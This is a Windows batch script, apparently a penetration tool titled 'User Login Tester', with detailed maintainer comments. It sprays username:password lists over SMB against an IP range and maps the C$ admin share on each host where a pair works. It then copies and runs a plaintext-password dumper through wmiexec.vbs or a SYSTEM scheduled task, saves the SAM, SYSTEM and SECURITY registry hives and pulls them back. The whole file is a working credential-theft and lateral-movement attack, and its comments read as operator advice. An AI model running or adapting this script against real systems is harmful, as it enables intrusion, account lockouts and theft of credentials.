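@echo off
rem AllInOne.bat -i 192.168.1.1-255 -u file.txt -o output.txt
rem
rem Sprays every user:pass pair from the -u file against each host in
rem the -i range or the -s list with net use. On the first hit it maps
rem the admin share, dumps plaintext passwords and the SAM, SYSTEM and
rem SECURITY hives, and appends everything to the -o file.
rem Authorised use only: every attempt is a remote logon that lands in
rem the target's security log and counts toward account lockout.

:start
if "%1" == "" goto :usage
rem Missing helpers are warned about, not fatal: check-dependency always
rem returns 0, so the spray still runs without the dumpers present.
call :check-dependency 32.exe
call :check-dependency 64.exe
rem call :check-dependency srvinfo.exe
rem call :check-dependency wmiexec.vbs
call :check-dependency wmiexec.vbs
rem Count positional arguments; at least six are needed for
rem "-s FILE or -i RANGE, -u FILE, -o FILE". Only the count and the
rem first flag are checked; -u and -o are taken by position.
set /a a=0
for %%a in (%*) do set /a a+=1
if %a% lss 6 goto :usage
rem Start from a clean host list. A trailing "rem" on the same line as
rem del is not a comment in batch, it becomes extra file arguments to
rem del, so the comment lives on its own line. The guard avoids the
rem "Could Not Find" message on a first run.
set TempFile=tmp.txt
if exist %TempFile% del %TempFile%
if "%1" == "-s" goto :file-list
rem Anything other than -s must be -i; fall through into :ip-range.
if not "%1" == "-i" goto :usage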

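rem convert ip range to ip list file
rem Expects the -i argument as A.B.C.D-E where only the last octet
rem varies, e.g. 192.168.1.7-254; the first three octets come from the
rem start address. A bare A.B.C.D with no dash is treated as a single
rem host. No validation of octets or of start being below end is done.
:ip-range
setlocal ENABLEDELAYEDEXPANSION
rem The closing paren sits on its own line: "set X=value )" stores the
rem space before the paren as part of the value, which left EndIP and
rem ipd with trailing whitespace and broke the empty-EndIP test below.
for /f "tokens=1,2 delims=-" %%i in ("%2") do (
	set StartIP=%%i
	set EndIP=%%j
)
for /f "tokens=1-4 delims=." %%i in ("!StartIP!") do (
	set ipa=%%i
	set ipb=%%j
	set ipc=%%k
	set ipd=%%l
)
rem Single address given: end the loop at the start octet.
if "!EndIP!" == "" set EndIP=!ipd!
for /l %%i in (!ipd!,1,!EndIP!) do (
	echo !ipa!.!ipb!.!ipc!.%%i >> !TempFile!
)
rem endlocal, not a second setlocal: the original opened a nested scope
rem instead of closing this one, which only worked because cmd unwinds
rem unclosed setlocals when the script ends. TempFile was set before
rem setlocal, so it survives into :main.
endlocal
goto :main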

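rem -s path: the argument after -s is a file with one host per line.
rem It is copied into TempFile so :main and :end treat both input modes
rem the same way. Bail out to usage if the file is missing; otherwise
rem copy fails and :main would run against a host list that no longer
rem exists. The default for /f in :main keeps only the first
rem whitespace-separated token of each line and skips lines that begin
rem with a semicolon, so the list should hold bare addresses or names.
:file-list
if not exist "%~2" (
	echo %2 DOES NOT EXIST!
	goto :usage
)
copy %2 %TempFile% /Y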

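rem Probe every host in TempFile and hand the live ones to :exploit.
rem Argument layout assumed here: argument four is the user:pass file
rem and argument six the output file; -u and -o are not checked.
:main
rem When -d is absent, domain is set to the literal text
rem percent-percent-i. That is NOT a bug: inside the for block below
rem the expanded text is substituted again as the loop variable, so
rem each host is tried as HOST\user, i.e. a local account. Do not
rem "fix" this without replacing the mechanism.
if "%7" == "-d" ( set domain=%8) else ( set domain=%%i)
for /f %%i in (%TempFile%) do (
	rem A reply line containing TTL= is the reliable sign of a live
	rem IPv4 host. The exit code alone is not: ping returns 0 for a
	rem gateway's "Destination host unreachable" reply, so the old
	rem errorlevel test reported such hosts as alive and sprayed them.
	rem IPv6-only replies carry no TTL= and are reported as down.
	ping %%i -n 1 | find "TTL=" >nul
	if not errorlevel 1 (
		echo    %%i alive
		rem alive.txt is appended to and never cleared between runs.
		echo %%i >>alive.txt
		call :exploit %%i %domain% %4 %6
	) else ( echo %%i down )
)
goto :end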

rem Warn when a helper file is missing from the working directory.
rem First argument: file name to look for. Always returns 0, so the
rem caller continues regardless; the console message is the only effect.
:check-dependency
if exist "%~1" exit /b 0
echo %~1 DOES NOT EXIST!
exit /b 0

:exploit
rem  server domain userfile  outfile
rem    %1    %2      %3        %4
rem
rem Try each user:pass line of userfile against \\server\c$. On the
rem first success the share stays mapped as B: while the dumpers run,
rem the credentials are written in PLAINTEXT to outfile, directory
rem listings and optional srvinfo/users output are appended, then the
rem mapping is dropped and the subroutine returns. The exit /b inside
rem the loop means only the first working pair is ever used per host.
rem
rem Caveats a practitioner should know:
rem - tokens=1,2 with delims=: truncates any password containing a
rem   colon at the first colon, so such pairs can never succeed.
rem - Every failed net use is a logon failure on the target and, for
rem   domain accounts, on the DC; long user:pass lists lock accounts.
rem - The password is echoed to the console and passed on the net use
rem   command line, so it is visible in scrollback and to anyone who
rem   can list processes on the operator machine.
rem - B: is hard-coded. If B: is already mapped, every net use fails
rem   and the host is reported as "net use failed"; if the script is
rem   interrupted between net use and /del the mapping is left behind.
for /F "tokens=1,2 delims=:" %%u in (%3) do (
	echo net use b: \\%1\c$ "%%v" /user:"%2\%%u"
	net use b: \\%1\c$ "%%v" /user:"%2\%%u"
	if not errorlevel 1 (
		echo    net use succeed
		echo =============== %1 =============== >> %4 
		echo user:%%u  pass:%%v >>%4 & echo.>>%4
		rem Presence of the x86 Program Files directory is the only
		rem 64-bit heuristic used; a WINNT directory marks Windows 2000.
		if exist "b:\Program Files (x86)" (
			call :getPass %1 64 "%2\%%u" "%%v"
		) else (
			rem 32.exe can't run on WIN2000
			if not exist "b:\WINNT" (call :getPass %1 32 "%2\%%u" "%%v")
		)
		rem no reg.exe exist on WIN2000 
		if not exist "b:\WINNT" (call :getReg %1 getreg "%2\%%u" "%%v")
		dir b:\ /a >>%4
		if exist "b:\Users" (
			echo    exist users
			dir b:\Users /a >> %4
		) else ( if exist "b:\Docume~1" (
			echo    exist documents and settings
			dir b:\Docume~1 /a >> %4 )
		)
		rem echo. lines are blank-line separators in the output file.
		echo.>>%4& echo.>> %4 
		rem srvinfo.exe and users.exe are optional; their checks in
		rem :start are commented out, so they are used only if present.
		if exist srvinfo.exe (
			srvinfo.exe -s \\%1 >>%4
			echo.>>%4& echo.>> %4 )
		if exist users.exe (
			users.exe %1 >>%4 )
		echo.>> %4 & echo.>> %4 & echo.>> %4 & echo.>> %4 & echo.>> %4 
		net use b: /del
		exit /b 0
	) else ( echo    net use failed )
)
exit /b 0

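:getPass
rem  server  prog-num  domain-user  pass
rem    %1       %2         %3        %4
rem
rem Copy the 32- or 64-bit dumper to the target's C:\ through the B:
rem mapping, run it there and collect its output into HOST-pass.txt in
rem the working directory. First attempt is wmiexec.vbs as the supplied
rem user; if cscript reports a non-zero exit the fallback is a scheduled
rem task running as SYSTEM. Only cscript's own exit code is checked, so
rem a dumper that ran but produced nothing is not retried. The dumper is
rem always removed from the target afterwards; the task and its .bat
rem only on the fallback path.
echo dump plaintext password
copy %2.exe b:\
rem -wait5000 sits inside the quoted remote command line, so it is an
rem argument to the dumper itself rather than to wmiexec.vbs. Assumed
rem to be its wait-for-output option; TODO confirm against 32/64.exe.
cscript /nologo wmiexec.vbs /cmd %1 %3 %4 "c:\%2.exe -wait5000" >%1-pass.txt
if %errorlevel% neq 0 (
	echo wmiexec failed, try schtasks
	echo c:\%2.exe ^> c:\%1-pass.txt >b:\%2.bat
	rem /ru "" makes the task run as NT AUTHORITY\SYSTEM. /sc DAILY
	rem means the task fires again every day if the /delete below
	rem fails, so check the target's task list after any error here.
	schtasks /create /s %1 /u %3 /p %4 /ru "" /sc DAILY /tn getpass  /tr c:\%2.bat /F
	rem schtasks /query  /s %1 /u %3 /p %4
	schtasks /run  	 /s %1 /u %3 /p %4 /i /tn getpass
	rem Sleep about five seconds so the task can finish. The old line
	rem pinged 1.1.1.1 with -w 5000 and -n 1, which only waits the full
	rem five seconds while that address is unreachable; it is a public
	rem resolver today and usually answers at once, so the move below
	rem could run before the task had written its output. Pinging
	rem loopback with -n 6 pauses one second between replies instead.
	ping 127.0.0.1 -n 6 >nul
	schtasks /delete /s %1 /u %3 /p %4 /f /tn getpass
	move /Y b:\%1-pass.txt %1-pass.txt
	del b:\%2.bat
)
del b:\%2.exe
exit /b 0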

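:getReg
rem  server  bat-name  domain-user  pass
rem    %1       %2       %3          %4
rem
rem Drop a batch file on the target through the B: mapping that saves
rem the SAM, SYSTEM and SECURITY hives into the target's C:\ root, run
rem it via wmiexec.vbs as the supplied user or, if cscript fails, as
rem SYSTEM through a scheduled task, then pull the .hive files back to
rem the working directory. Saving the SECURITY hive may need SYSTEM or
rem backup privilege, so the wmiexec path can yield fewer than three
rem hives; nothing here checks which files actually came back.
echo dump reg file
echo reg save hklm\sam c:\%1-sam.hive >b:\%2.bat
echo reg save hklm\system c:\%1-system.hive >>b:\%2.bat
echo reg save hklm\security c:\%1-security.hive >>b:\%2.bat
rem The next line prints the full command, password included, to the
rem console; it is there for debugging and leaks the credential.
echo cscript /nologo wmiexec.vbs /cmd %1 %3 %4 "c:\%2.bat -wait5000"
rem -wait5000 is passed as an argument to the .bat, which never reads
rem it; presumably carried over from :getPass. Harmless.
cscript /nologo wmiexec.vbs /cmd %1 %3 %4 "c:\%2.bat -wait5000"
if %errorlevel% neq 0 (
	echo wmiexec failed, try schtasks
	rem /ru "" runs the task as NT AUTHORITY\SYSTEM. With /sc DAILY the
	rem task keeps firing if the /delete below fails.
	schtasks /create /s %1 /u %3 /p %4 /ru "" /sc DAILY /tn getreg  /tr c:\%2.bat /F
	rem schtasks /query  /s %1 /u %3 /p %4
	schtasks /run  	 /s %1 /u %3 /p %4 /i /tn getreg
	rem Sleep about five seconds. The old ping of 1.1.1.1 with -w 5000
	rem only waits that long while the address is unreachable; it now
	rem answers on most networks, so the hives could be moved before
	rem reg save had finished. Loopback with -n 6 waits reliably.
	ping 127.0.0.1 -n 6 >nul
	schtasks /delete /s %1 /u %3 /p %4 /f /tn getreg
)
rem move with a single operand moves into the current directory; /Y
rem overwrites hives left by an earlier run against the same host.
rem TODO confirm the one-operand form on the cmd versions in use.
move /Y b:\*.hive
del b:\%2.bat
exit /b 0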

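rem Print usage and stop. Only ever reached by goto, so goto :eof ends
rem the batch file. Arguments are positional: -u and -o must be the
rem second and third pairs, and -d, if present, the fourth pair. The
rem script's own name is printed instead of a hard-coded one, since the
rem header comment and this text disagreed on the file name.
:usage
echo.
echo    User Login Tester by. Twi1ight@T00ls.Net
echo    %~nx0 [-s file ^| -i ip-addr] -u file -o output.txt [-d domain]
echo 	-s	server list file
echo 	-i	ip address range, such as "192.168.1.7-254"
echo 	-u	username and password file, separated by character :
echo 	-o	output file
echo 	-d	domain name if exists
echo 	32.exe 64.exe srvinfo.exe users.exe wmiexec.vbs
echo.
goto :eof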

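rem Normal exit: remove the host list and close the innermost setlocal
rem left open by :ip-range; cmd unwinds any others when the script
rem ends. On the -s path no setlocal is open and endlocal is a no-op.
:end
rem The temp file does not exist when the -i range produced no hosts,
rem which made del print "Could Not Find"; guard it.
if exist %TempFile% del %TempFile%
endlocal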